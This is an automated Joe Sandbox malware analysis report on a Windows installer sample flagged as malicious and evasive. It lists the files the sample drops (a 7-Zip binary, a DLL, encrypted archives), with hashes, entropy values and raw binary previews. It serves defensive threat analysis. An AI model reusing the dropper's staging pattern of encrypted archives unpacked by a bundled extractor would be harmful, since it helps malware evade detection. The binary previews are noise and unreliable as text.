https://www.innosetup.com/	#U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046446817.000000007F99B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046093911.0000000003030000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000000.2047774569.0000000000A11000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000000.2140430410.0000000000D3D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580229
Start date and time:	2024-12-24 05:01:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	108
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Sample name:	#U5b89#U88c5#U52a9#U624b1.0.1.exe renamed because original name is a hash value
Original Sample Name:	1.0.1.exe
Detection:	MAL
Classification:	mal80.evad.winEXE@133/33@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 77% Number of executed functions: 28 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Windows NT\7zr.exe	#U5b89#U88c5#U52a9#U624b1.0.3.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.8.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.8.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Get hash	malicious	Unknown	Browse
	#U5b89#U88c5#U52a9#U624b_2.0.7.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Windows NT\7zr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	831200
Entropy (8bit):	6.671005303304742
Encrypted:	false
SSDEEP:	24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5:	84DC4B92D860E8AEA55D12B1E87EA108
SHA1:	56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256:	BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512:	CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.\| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..\| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\file.bin (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	data
Category:	dropped
Size (bytes):	2603681
Entropy (8bit):	7.9999250486601365
Encrypted:	true
SSDEEP:	49152:CAQF5rEv9l8kq6OyoWZqzEwn9192vEpJ9syz09uPhPTehqd9zQwp7N8WyAhlBi:GFxEFCwiWDwn91vJ9Dzhd90wpRgH
MD5:	3B9FD0924DB73BAA952BEB4A7BD7D6DE
SHA1:	66C0C97BBF4B25A31F35CB8029593B472BE5F056
SHA-256:	4A293DA92330E5FE2BD56DD600E245E2AB9BCAA15FA091BB04E60C6B23C3EF95
SHA-512:	41CD19F53535FBC592C050AE70B40BB82799A9A955B516446864961E5E559EAC2B6AA7E0A47BF89FAB5B38A754EC426076635E514C0D1E87BEBCAA66C5E8E402
Malicious:	false
Preview:	.@S....+.YN.F..............4.%..6W.Bi6..B.i.\|.M...>~rcE...2.@o.1....:..Y. ..j!}.).d..pi..T-......l.....`.W.T~.........Q...\|..W.......,./..Z{..FqaLj.....o.+9N./....5..3Ix......i.i$C&.O}.Z..?..1-4.=....zw..5.N8.I;.D..Tv..@.....e\,?.7.Kx.6<S3kd.2...`..rd<..........N%..........=...V...#.._...#.m...V.L...'..W..T..5.u.A....g.fg).....FB....8....w../.......&Lts.3.{.S.c...dX.2.S..e......ls.WE.N.\|l...3h!..a.M.K......lh.`............t.w}..,......adq]<.y;.....a.....$.c.tJ.U.l..Z.',.....:..2....:..5.....S[.98.cF..DL.F.o.<.o3K..h....f....i2%.........zIkZ.._.gh...@.h.u..-z.A..G...e..[...%..7.........'..{x>@A...&...(..UQ../..ZD.N...i..q.5&}.].<...(.wr...f.M....pn...UW^.....\...V..s....E...s._..~nv.%t,.........qQ..U...;)..wA...O.WB.x.,....N...{..._.{.w;..5..a.r.zY\|b...l6....p.f........k.....o.0.+..ihu.,.^>.9vV..f.p.6~.2pf...j.@....wLO.kwhF.....3.wW.Y4..^...td}....Z...\...E..st4(.{,.\.W..4.....g.yq....G.^8..n..U<I.mS".....K.q........@@..e?.x3....

C:\Program Files (x86)\Windows NT\hrsw.vbc

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3606528
Entropy (8bit):	7.005604268954487
Encrypted:	false
SSDEEP:	98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
MD5:	1047AF726D2E233D71934EF55E635C4A
SHA1:	AB12E827E4E57DEA2E885733F0C48E9A83756678
SHA-256:	42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
SHA-512:	8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\is-18TF5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	2353553
Entropy (8bit):	7.99992611421159
Encrypted:	true
SSDEEP:	49152:rtfmdyArF7jC2uzD04c4vtHlkTmMVDfFv3ARw3ieIXzFj0nHfh:roDrBKxxlkq0fNAW3ieIXzuZ
MD5:	73616E6FB705D7163A2D8A391DDCAD6C
SHA1:	2ADEE96903C346D920E7B7B7527BE089F8388D87
SHA-256:	4AE1FF98AEC7817FF9E35A15118CFBD61CCF00C766ABE08C4EEFB58889EDF04E
SHA-512:	74D4726E6593783D062AFB2703C1B6465019C247DD2468B657AD95413BC4A3707F9D2695D9BE3CA51C9590A28C3ED22DDC52615F10F742A4432CD3A72A3A18FD
Malicious:	false
Preview:	....;.3......v.D.8.Wg..y.v.....u....Bwa...]`t...~..-..n.........9l..v.I}gwwT..7H.t?..6.G.x.-'7....]$...iq~....J`........$...(..m.z....,y..2C7.?...O...D.._..dP.&;....n .....a..l...#R......K.[&.eb.\&B..M..d .[.<.t\..W..,$........;@..........?.x..$+..Z...:.f....i.WL'..g .Xv1V....[f..._........+'.T.9..%...../v_)...G0........`(.J1+....U.l.9..2........Y..._K.....z.-......$..@E..c.J..c....B....h.;.5..2I7>....e.L...R..M.0"jz'.....g......:...A.?s...]C3?.%.....;.."..1........\Q...d+..Z...:-..M.Q.o.P...Y...`%O..I.f?.Kb...2./'].?Qq....+f..)..g["9.0.S..T+A...Z..v....Y...uR(.....3....&kD....D.+..v......Of,.D....Vz.9.9jZ.d...f...c..m.[Y....\|5.jV.....Oq...5.t\|.. N.P..~...a...5.......3.<++'...=..<.....l..!_.o9L.:..y..g.T.\...H.@....../t..<L.F.q1..B.!.9+\|.s}e4.jZbg_W..t..{.&xY.q.8.=M...8.O..x..._]6h%....g.....~.O..........$..p.~!.E[.!.+b.EH.......)..2.).KH.....(p...%u......!.t\+.....R. .$.ir...m.L+IC...OD....:26..y.j.x<L.?u.R.........x...........[.

C:\Program Files (x86)\Windows NT\is-LHLK8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	data
Category:	dropped
Size (bytes):	2603681
Entropy (8bit):	7.9999250486601365
Encrypted:	true
SSDEEP:	49152:CAQF5rEv9l8kq6OyoWZqzEwn9192vEpJ9syz09uPhPTehqd9zQwp7N8WyAhlBi:GFxEFCwiWDwn91vJ9Dzhd90wpRgH
MD5:	3B9FD0924DB73BAA952BEB4A7BD7D6DE
SHA1:	66C0C97BBF4B25A31F35CB8029593B472BE5F056
SHA-256:	4A293DA92330E5FE2BD56DD600E245E2AB9BCAA15FA091BB04E60C6B23C3EF95
SHA-512:	41CD19F53535FBC592C050AE70B40BB82799A9A955B516446864961E5E559EAC2B6AA7E0A47BF89FAB5B38A754EC426076635E514C0D1E87BEBCAA66C5E8E402
Malicious:	false
Preview:	.@S....+.YN.F..............4.%..6W.Bi6..B.i.\|.M...>~rcE...2.@o.1....:..Y. ..j!}.).d..pi..T-......l.....`.W.T~.........Q...\|..W.......,./..Z{..FqaLj.....o.+9N./....5..3Ix......i.i$C&.O}.Z..?..1-4.=....zw..5.N8.I;.D..Tv..@.....e\,?.7.Kx.6<S3kd.2...`..rd<..........N%..........=...V...#.._...#.m...V.L...'..W..T..5.u.A....g.fg).....FB....8....w../.......&Lts.3.{.S.c...dX.2.S..e......ls.WE.N.\|l...3h!..a.M.K......lh.`............t.w}..,......adq]<.y;.....a.....$.c.tJ.U.l..Z.',.....:..2....:..5.....S[.98.cF..DL.F.o.<.o3K..h....f....i2%.........zIkZ.._.gh...@.h.u..-z.A..G...e..[...%..7.........'..{x>@A...&...(..UQ../..ZD.N...i..q.5&}.].<...(.wr...f.M....pn...UW^.....\...V..s....E...s._..~nv.%t,.........qQ..U...;)..wA...O.WB.x.,....N...{..._.{.w;..5..a.r.zY\|b...l6....p.f........k.....o.0.+..ihu.,.^>.9vV..f.p.6~.2pf...j.@....wLO.kwhF.....3.wW.Y4..^...td}....Z...\...E..st4(.{,.\.W..4.....g.yq....G.^8..n..U<I.mS".....K.q........@@..e?.x3....

C:\Program Files (x86)\Windows NT\locale.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	56514
Entropy (8bit):	7.996871451143694
Encrypted:	true
SSDEEP:	1536:mPAiXXCuGhffQfTWvMcdyw9W0wV/JQ+PX7D0sC1pr7MN2c3:mL5iQfTWvM9/S+/0fMAM
MD5:	F8884F03FE2A94096CD9DB4DFFE29A40
SHA1:	A139A68287F4E3FF9486273AA0E8CE16432CF819
SHA-256:	5D3E892B057465CC9D66CF84268CA7FBB040EF8A797653B99597E6E9DDA16D35
SHA-512:	F3EAC63B1A4D05BAEC1CD79522D8B65EB9F72E6F72DD4A38C62FF90165067266A08E0CEC9A9DBF6E1C68D228B0E89D37A83C68B334AF22ADD23CD3E9C7F20390
Malicious:	false
Preview:	.@S....f... ..............`.......uw..R.).......\.3...Wz......7v#....$D....+.V.}....r.!.!..&.y}.t......K%sG.6.W\|m..'.v...jZ!.j6nd....u$.P}..$..a34c..K.R...5H...."..c....4.......M..7g.G..6..Y.e..~.....d....;Gn._o .G.qp...J..ao.z[...F%.S...&...J>@...............RF....P.>`.....K22.......[dgUc.R..R.U......D.my...\|...qOvRO...}.)!VD'c...(....R...zi~U..zZV.ps._....iw..v....{..!..x.6....nH......o.......g...{....[.f...NA......l.2..bP.Ng...T..0...u..c..^.Y..n.\.&.#...rn...#.Vk[G.#.?....Z'\|.:e..A.].4..B..?=K..Y..~.aqp...H....V..t....'.=...e.X.t......}....N..\.\|..VZ..).Fr.....X..n9...6..Y..o.ZWi...1.....[.A.e.l....).r..2]...Q<O$$d./!.?..f\..7a.'..tfh.5Dz:..i..r1M.w..U.y......1...J ...o.2...0.{..).Zf.....S....j.TQ..!....T.0p?..+.T...rG.D.x:3......f.D8....nT.v..nK...cT......}.1.r...<..&.?V..F...u.....x..z..'...5l....?.....W..=.G......Q...\.....b..Q..I..d-...].[-?O.Q........u..2.=`<W.Z~..w..8P.$~..Y..=..B...l....8..A.h\....c.G..fqu,0...lI.]Bv.m.4....j....q....

C:\Program Files (x86)\Windows NT\locale.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	56514
Entropy (8bit):	7.9968714511436945
Encrypted:	true
SSDEEP:	1536:HokFPP32DIjpUKb0m13fiDdCu3ELc3d5wbMjeYIcJLYuJUWLxMBRc:Ho4PP6gb0OYdCcELwYtYIcJL32WiBRc
MD5:	F872271BC29C420B64116E4FA31D04DC
SHA1:	E009BDDF7E43633678F6259524E8AFF6EC85103D
SHA-256:	081F6BD3EC3B5F9EE39F42942DD608C96134AE459734B031132DBF92ACBE751A
SHA-512:	1803172A6CD5BA42CA257F057602CBBCC511CCB85FE86495C5708A2AE6563C40966E27A2C8768B8363ABD1A4028EAB53C7F81BDFADE9384CAB99A71B9B509A2C
Malicious:	false
Preview:	7z..'...... p.......2...........G`.k...2........%6.T..f.v...}/..&.^b...05.l..&.J;..W.s.Mw.a...s.>2t? ..i...G.....e..P..\|..h...Z..1..%..`.XP.Bp....i...t...B8....\.n.)..m..j..n~.[..b.se.....E..R.Sm)..('IE..!p...~......r..V..$P..4fB.....V..N.....K.1wP...0okz.YL.g(.~.....2<.....U.=........4^.x.=...$.LG.0..V).........3.p"Z.H......../.P0.(>......L..........S.T..h+.5.0=.h..H..V;...$.. .G..}.n:4!9.9V]Y..9.....=G..G.OE+.0./...7..B!3.<..P6.z.&...a.P.r........ci .-....q.S.ys.l.....Z. ...O{.......&.^p.>....O..,GK.m..8...K....,.c.U....-.Z..I.p/.j2H.!......X..,.h.L..5..6...E..u....U~U..{)..6J...s..~n.p.]......n.....,....].O=.e.my........i.As....rP....Z.2....V..5...U.......".....$3.o.P.....3.I...3..9<N.~..xQ...qi....[....,4Uh.d(.1H..Q.l9.....I...(9....;..7.=...M....y.\|..4..1..vY#.@.8.Y.}2.E<..gP...\{.....X.m.f.+4...b\|....swd....<...2g.. Sr......>.&....hl.e.......U..Y.....{.p0.y..'..O.<.}.d.T;.._/zHM....3.....EFp.."q.....r.*R....h7\....:

C:\Program Files (x86)\Windows NT\locale2.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	56546
Entropy (8bit):	7.996966859255975
Encrypted:	true
SSDEEP:	1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5:	CEA69F993E1CE0FB945A98BF37A66546
SHA1:	7114365265F041DA904574D1F5876544506F89BA
SHA-256:	E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512:	4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious:	false
Preview:	.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.\|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~.....'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z\|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p..bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm....E....2........s. R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

C:\Program Files (x86)\Windows NT\locale2.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	56546
Entropy (8bit):	7.996966859255979
Encrypted:	true
SSDEEP:	1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
MD5:	4CB8B7E557C80FC7B014133AB834A042
SHA1:	C42E2C861FF3ED0E6A11824E12F67A344E8F783D
SHA-256:	3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
SHA-512:	A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
Malicious:	false
Preview:	7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..\|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.\|. a.:..5.....b.....2......W.....Z.pS.b/.F.;\|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f........@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..\| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..\|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

C:\Program Files (x86)\Windows NT\locale3.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	31890
Entropy (8bit):	7.99402458740637
Encrypted:	true
SSDEEP:	768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
MD5:	8622FC7228777F64A47BD6C61478ADD9
SHA1:	9A7C15F341835F83C96DA804DC1E21FDA696BB56
SHA-256:	4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
SHA-512:	71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
Malicious:	false
Preview:	.@S......................xi.\ .~.#..:}..fy?koGL^\|kH.G...........x....Tg.Y.t....~^..".L.41.....R..\|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.\|a.]..@DP".`Rz}...\|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........\|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C.......V..\|..2.J..i.r....\|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ...8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

C:\Program Files (x86)\Windows NT\locale3.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	31890
Entropy (8bit):	7.99402458740637
Encrypted:	true
SSDEEP:	768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
MD5:	CE6034AFC63BB42F4E0D6CD897DFBCB8
SHA1:	49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
SHA-256:	7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
SHA-512:	7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
Malicious:	false
Preview:	7z..'....oYU@\|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc.o@\|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB\|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

C:\Program Files (x86)\Windows NT\locale4.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	74960
Entropy (8bit):	7.99759370165655
Encrypted:	true
SSDEEP:	1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
MD5:	950338D50B95A25F494EE74E97B7B7A9
SHA1:	F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
SHA-256:	87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
SHA-512:	9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
Malicious:	false
Preview:	.@S........................F.T....r...z'I.N..].u.e.e..y.....<\|r.:v.....J.i...L.Sv.....Nz..,..K.sI./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X\|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.......9;..R...VL.]..%j.....TM.4.....P.L...

C:\Program Files (x86)\Windows NT\locale4.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	74960
Entropy (8bit):	7.997593701656546
Encrypted:	true
SSDEEP:	1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
MD5:	059BA7C31F3E227356CA5F29E4AA2508
SHA1:	FA3DC96A3336903ED5E6105A197A02E618E3F634
SHA-256:	1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
SHA-512:	E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
Malicious:	false
